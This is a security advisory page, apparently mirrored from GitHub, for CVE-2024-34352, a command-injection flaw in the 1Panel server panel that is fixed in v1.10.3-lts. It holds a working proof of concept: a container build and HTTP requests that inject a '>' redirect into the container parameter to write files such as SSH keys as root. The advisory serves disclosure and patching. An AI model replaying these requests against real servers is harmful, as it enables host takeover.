Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-f8ch-w75v-c847

Опубликовано: 09 мая 2024
Источник: github
Github: Прошло ревью
CVSS3: 6.5

Описание

1Panel arbitrary file write vulnerability

Summary

There are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. We can use the following mirror configuration write symbol > to achieve arbitrary file writing

PoC

Dockerfile

FROM bash:latest COPY echo.sh /usr/local/bin/echo.sh RUN chmod +x /usr/local/bin/echo.sh CMD ["echo.sh"]

echo.sh

#!/usr/local/bin/bash echo "Hello, World!"

Build this image like this, upload it to dockerhub, and then 1panel pulls the image to build the container Send the following packet, taking care to change the containerID to the malicious container we constructed

GET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e87d2717898d120dac23b13b6f1377%3E%2Ftmp%2F1&since=all&tail=100&follow=true HTTP/1.1 Host: xxxx:42713 Connection: Upgrade Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Upgrade: websocket Origin: http://xxx:42713 Sec-WebSocket-Version: 13 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: psession=88e51389-ddce-468c-a3be-51c5b2cb2d9d Sec-WebSocket-Key: FdXBKFviqO4+LSEoucITLA==

Then you can write any customized file to, for example, a ssh key, and generally the application is run with root privileges

GET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e87d2717898d120dac23b13b6f1377%3E%2Froot%2F.ssh%2f1&since=all&tail=100&follow=true HTTP/1.1 Host: xxx:42713 Connection: Upgrade Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Upgrade: websocket Origin: http://xxx:42713 Sec-WebSocket-Version: 13 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: psession=88e51389-ddce-468c-a3be-51c5b2cb2d9d Sec-WebSocket-Key: FdXBKFviqO4+LSEoucITLA==

Or write a timed task to execute any command.

Impact

The ability to write arbitrary files on the host where the service is deployed can lead to a host takeover

Ссылки

Пакеты

Наименование

github.com/1Panel-dev/1Panel

go
Затронутые версииВерсия исправления

< 1.10.3-lts

1.10.3-lts

EPSS

Процентиль: 85%
0.0244
Низкий

6.5 Medium

CVSS3

CVE ID

CVE-2024-34352

Дефекты

CWE-77

Связанные уязвимости

nvd логотип

CVE-2024-34352

CVSS3: 6.5
nvd
больше 1 года назад

1Panel is an open source Linux server operation and maintenance management panel. Prior to v1.10.3-lts, there are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. The mirror configuration write symbol `>` can be used to achieve arbitrary file writing. This vulnerability is fixed in v1.10.3-lts.

EPSS

Процентиль: 85%
0.0244
Низкий

6.5 Medium

CVSS3

CVE ID

CVE-2024-34352

Дефекты

CWE-77